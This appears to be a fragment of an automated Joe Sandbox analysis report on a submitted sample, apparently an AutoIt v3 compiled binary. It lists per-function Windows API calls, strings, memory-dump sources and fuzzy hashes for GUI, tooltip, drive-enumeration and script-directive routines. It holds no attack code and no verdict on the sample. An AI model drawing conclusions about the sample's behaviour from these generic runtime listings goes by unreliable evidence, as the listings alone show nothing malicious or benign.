                                                                • Part of subcall function 004BA8CA: SetBkColor.GDI32(?,00000000), ref: 004BA96D
                                                                • Part of subcall function 004BA8CA: SelectObject.GDI32(?,?), ref: 004BA97A
                                                                • Part of subcall function 004BA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 004BA999
                                                                • Part of subcall function 004BA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004BA9B0
                                                                • Part of subcall function 004BA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 004BA9C5
                                                                • Part of subcall function 004BA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004BA9ED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              • Opcode ID: 0c1009a68a728ad4b215a5f3e75ed7fd65cac16bbdf8dd0c479867db99a78b01
                                                              • Instruction ID: 4330a7a9623b758152961859e2349c64fe57bd1d5b97182c5581baf5a54f6ec1
                                                              • Opcode Fuzzy Hash: 0c1009a68a728ad4b215a5f3e75ed7fd65cac16bbdf8dd0c479867db99a78b01
                                                              • Instruction Fuzzy Hash: 18917071408301FFCB109F68DC08A9B7BA9FF48321F104B3AF966961A1D775D949CB6A
                                                              APIs
                                                              • DestroyWindow.USER32(00000000), ref: 004A74DE
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A759D
                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004A75DB
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004A75ED
                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 004A7633
                                                              • GetClientRect.USER32(00000000,?), ref: 004A763F
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 004A7683
                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004A7692
                                                              • GetStockObject.GDI32(00000011), ref: 004A76A2
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004A76A6
                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004A76B6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004A76BF
                                                              • DeleteDC.GDI32(00000000), ref: 004A76C8
                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004A76F4
                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 004A770B
                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 004A7746
                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004A775A
                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 004A776B
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 004A779B
                                                              • GetStockObject.GDI32(00000011), ref: 004A77A6
                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004A77B1
                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004A77BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                              • API String ID: 2910397461-517079104
                                                              • Opcode ID: abbb5aa052789cf38cba546dd165cff6e28e9b1a7aeaf1a914b50994832d095c
                                                              • Instruction ID: a9b32efbb8d84d1adf237f4a4397c730cc2acf76f9f61c4fff17d1d67b21ad56
                                                              • Opcode Fuzzy Hash: abbb5aa052789cf38cba546dd165cff6e28e9b1a7aeaf1a914b50994832d095c
                                                              • Instruction Fuzzy Hash: 76A17371A00605BFEB14DBA8DC4AFAF7B69EB09714F114265FA14A72E0C674AD10CF68
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0049AD1E
                                                              • GetDriveTypeW.KERNEL32(?,004BFAC0,?,\\.\,004BF910), ref: 0049ADFB
                                                              • SetErrorMode.KERNEL32(00000000,004BFAC0,?,\\.\,004BF910), ref: 0049AF59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: 2a612b507905c0d604a238fd284f892f130157e80018aebee418c59a64baba5f
                                                              • Instruction ID: 2d4c8738eabbb27ead5b1bb68ed8b33ec2be632e8a59cbcf6c04d11ee773b161
                                                              • Opcode Fuzzy Hash: 2a612b507905c0d604a238fd284f892f130157e80018aebee418c59a64baba5f
                                                              • Instruction Fuzzy Hash: 2151B4B06441059B8F10DB11C942DBE7BA1EB48709B30417FF80AA7694DA7DAD22DB8F
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: 13f54fbc9a197fad7bdd30e93c92220b60e0de23ffaa6380b44856b3114d48cd
                                                              • Instruction ID: 271ea1fbd57a96a91c6bd982e6ea5f843a8e7eb4efd9c11468fa0507a5e1a075
                                                              • Opcode Fuzzy Hash: 13f54fbc9a197fad7bdd30e93c92220b60e0de23ffaa6380b44856b3114d48cd
                                                              • Instruction Fuzzy Hash: 84810CB46002067ACF10AF62DC43FAF37A8AF09745F14902BFD056B292EB6DD945C66D
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 004B9AD2
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004B9B8B
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 004B9BA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: ba20d1aa00bf13c266d35604fc3d3ef9ccf220ffb065fd011d32879bd180d7fc
                                                              • Instruction ID: a55902f07b5eb8a11621bb23b8f8a8d61baaebbcef74c89d174f2ecae72b8bbc
                                                              • Opcode Fuzzy Hash: ba20d1aa00bf13c266d35604fc3d3ef9ccf220ffb065fd011d32879bd180d7fc
                                                              • Instruction Fuzzy Hash: 2202AD30104201ABD725CF24C849BEBBBE5FF49314F04862EFA99963A1C778DD55CB6A
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 004BA903
                                                              • SetTextColor.GDI32(?,?), ref: 004BA907
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004BA91D
                                                              • GetSysColor.USER32(0000000F), ref: 004BA928
                                                              • CreateSolidBrush.GDI32(?), ref: 004BA92D
                                                              • GetSysColor.USER32(00000011), ref: 004BA945
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004BA953
                                                              • SelectObject.GDI32(?,00000000), ref: 004BA964
                                                              • SetBkColor.GDI32(?,00000000), ref: 004BA96D
                                                              • SelectObject.GDI32(?,?), ref: 004BA97A
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004BA999
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004BA9B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004BA9C5
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004BA9ED
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004BAA14
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 004BAA32
                                                              • DrawFocusRect.USER32(?,?), ref: 004BAA3D
                                                              • GetSysColor.USER32(00000011), ref: 004BAA4B
                                                              • SetTextColor.GDI32(?,00000000), ref: 004BAA53
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004BAA67
                                                              • SelectObject.GDI32(?,004BA5FA), ref: 004BAA7E
                                                              • DeleteObject.GDI32(?), ref: 004BAA89
                                                              • SelectObject.GDI32(?,?), ref: 004BAA8F
                                                              • DeleteObject.GDI32(?), ref: 004BAA94
                                                              • SetTextColor.GDI32(?,?), ref: 004BAA9A
                                                              • SetBkColor.GDI32(?,?), ref: 004BAAA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: e9cc502c1633a291c51eb18581a83ebf656a10a39246e8c06064bee289a03e4b
                                                              • Instruction ID: d43c3baa796381f7886760aa9eda615cf9d3b29bf43846211d731146408bb412
                                                              • Opcode Fuzzy Hash: e9cc502c1633a291c51eb18581a83ebf656a10a39246e8c06064bee289a03e4b
                                                              • Instruction Fuzzy Hash: 83513B71900208FFDF109FA8DC48EEE7BB9EB08320F114626F915AB2A1D7759954DFA4
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004B8AC1
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004B8AD2
                                                              • CharNextW.USER32(0000014E), ref: 004B8B01
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004B8B42
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004B8B58
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004B8B69
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 004B8B86
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 004B8BD8
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 004B8BEE
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 004B8C1F
                                                              • _memset.LIBCMT ref: 004B8C44
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 004B8C8D
                                                              • _memset.LIBCMT ref: 004B8CEC
                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 004B8D16
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 004B8D6E
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 004B8E1B
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004B8E3D
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004B8E87
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004B8EB4
                                                              • DrawMenuBar.USER32(?), ref: 004B8EC3
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 004B8EEB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: ac777a73c535bcfeeb2d93e153d47fba1648a5ed9d0719c8b8fb6877513aa659
                                                              • Instruction ID: 23d7fdc5e285c6afd07a961b29afc5a6fd05d39e59d57e9652904b062814a4bf
                                                              • Opcode Fuzzy Hash: ac777a73c535bcfeeb2d93e153d47fba1648a5ed9d0719c8b8fb6877513aa659
                                                              • Instruction Fuzzy Hash: A6E19270900208ABDF209F65CC84EEF7B7DEF09710F10815BFA15AA291DB789985DF69
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 004B49CA
                                                              • GetDesktopWindow.USER32 ref: 004B49DF
                                                              • GetWindowRect.USER32(00000000), ref: 004B49E6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004B4A48
                                                              • DestroyWindow.USER32(?), ref: 004B4A74
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004B4A9D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004B4ABB
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004B4AE1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004B4AF6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004B4B09
                                                              • IsWindowVisible.USER32(?), ref: 004B4B29
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004B4B44
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 004B4B58
                                                              • GetWindowRect.USER32(?,?), ref: 004B4B70
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 004B4B96
                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 004B4BB0
                                                              • CopyRect.USER32(?,?), ref: 004B4BC7
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 004B4C32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: 303280a4eb93fc09dbaa22a0c33e1c23ad95869dc3d9c0dc457ad9f3200cb728
                                                              • Instruction ID: f9360dae1ad0de899de88b421a9a3c9e5d919ddb6dce7d9d00b9f58ba266f128
                                                              • Opcode Fuzzy Hash: 303280a4eb93fc09dbaa22a0c33e1c23ad95869dc3d9c0dc457ad9f3200cb728
                                                              • Instruction Fuzzy Hash: 03B17E71604340AFDB04DF65C884B9BBBE4BF88714F008A1EF9999B292D775EC05CB69
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004944AC
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004944D2
                                                              • _wcscpy.LIBCMT ref: 00494500
                                                              • _wcscmp.LIBCMT ref: 0049450B
                                                              • _wcscat.LIBCMT ref: 00494521
                                                              • _wcsstr.LIBCMT ref: 0049452C
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00494548
                                                              • _wcscat.LIBCMT ref: 00494591
                                                              • _wcscat.LIBCMT ref: 00494598
                                                              • _wcsncpy.LIBCMT ref: 004945C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: 14a29d1e3978c44b7a17c46782dc101b2f3d538e1a45bc2543c3328b1f74b483
                                                              • Instruction ID: 47dcc92a03768fed43477dabcb6cf82c3255cb2820327f8a8ec02472e7d01941
                                                              • Opcode Fuzzy Hash: 14a29d1e3978c44b7a17c46782dc101b2f3d538e1a45bc2543c3328b1f74b483
                                                              • Instruction Fuzzy Hash: 3641F8715002007BDB10AA75CC07EBF7B6CDF86715F10006FFD08A6183EA7C9A0A86AD
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004328BC
                                                              • GetSystemMetrics.USER32(00000007), ref: 004328C4
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004328EF
                                                              • GetSystemMetrics.USER32(00000008), ref: 004328F7
                                                              • GetSystemMetrics.USER32(00000004), ref: 0043291C
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00432939
                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00432949
                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0043297C
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00432990
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 004329AE
                                                              • GetStockObject.GDI32(00000011), ref: 004329CA
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004329D5
                                                                • Part of subcall function 00432344: GetCursorPos.USER32(?), ref: 00432357
                                                                • Part of subcall function 00432344: ScreenToClient.USER32(004F57B0,?), ref: 00432374
                                                                • Part of subcall function 00432344: GetAsyncKeyState.USER32(00000001), ref: 00432399
                                                                • Part of subcall function 00432344: GetAsyncKeyState.USER32(00000002), ref: 004323A7
                                                              • SetTimer.USER32(00000000,00000000,00000028,00431256), ref: 004329FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: ba1863de7012d3f676423803fa6413344796acf7870f3e7c162353cbe3011c74
                                                              • Instruction ID: 139a87d1f6620010c9d41582e0cfa1340ecca3fbf89163c7321fc33a5ada33fe
                                                              • Opcode Fuzzy Hash: ba1863de7012d3f676423803fa6413344796acf7870f3e7c162353cbe3011c74
                                                              • Instruction Fuzzy Hash: 66B15271600209EFDB14EFA8DD45BEE7BB4FB08315F10422AFA1597290DB78A851CF59
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0048A47A
                                                              • __swprintf.LIBCMT ref: 0048A51B
                                                              • _wcscmp.LIBCMT ref: 0048A52E
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0048A583
                                                              • _wcscmp.LIBCMT ref: 0048A5BF
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0048A5F6
                                                              • GetDlgCtrlID.USER32(?), ref: 0048A648
                                                              • GetWindowRect.USER32(?,?), ref: 0048A67E
                                                              • GetParent.USER32(?), ref: 0048A69C
                                                              • ScreenToClient.USER32(00000000), ref: 0048A6A3
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0048A71D
                                                              • _wcscmp.LIBCMT ref: 0048A731
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0048A757
                                                              • _wcscmp.LIBCMT ref: 0048A76B
                                                                • Part of subcall function 0045362C: _iswctype.LIBCMT ref: 00453634
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                              • String ID: %s%u
                                                              • API String ID: 3744389584-679674701
                                                              • Opcode ID: 40454b99208e98746a6839c4c4fe215f3be82169db178303dd3e9a3f207b9e2b
                                                              • Instruction ID: a64362e5e4a5330be5c07ca594f51a39d195a4847090429a361c3b9d9b6f32c5
                                                              • Opcode Fuzzy Hash: 40454b99208e98746a6839c4c4fe215f3be82169db178303dd3e9a3f207b9e2b
                                                              • Instruction Fuzzy Hash: 7EA1D431204206AFE714EF64C884BAFB7E8FF44345F00492BF999D2150D778E965CB9A
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0048AF18
                                                              • _wcscmp.LIBCMT ref: 0048AF29
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0048AF51
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0048AF6E
                                                              • _wcscmp.LIBCMT ref: 0048AF8C
                                                              • _wcsstr.LIBCMT ref: 0048AF9D
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0048AFD5
                                                              • _wcscmp.LIBCMT ref: 0048AFE5
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0048B00C
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0048B055
                                                              • _wcscmp.LIBCMT ref: 0048B065
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0048B08D
                                                              • GetWindowRect.USER32(00000004,?), ref: 0048B0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 1788623398-1539354611
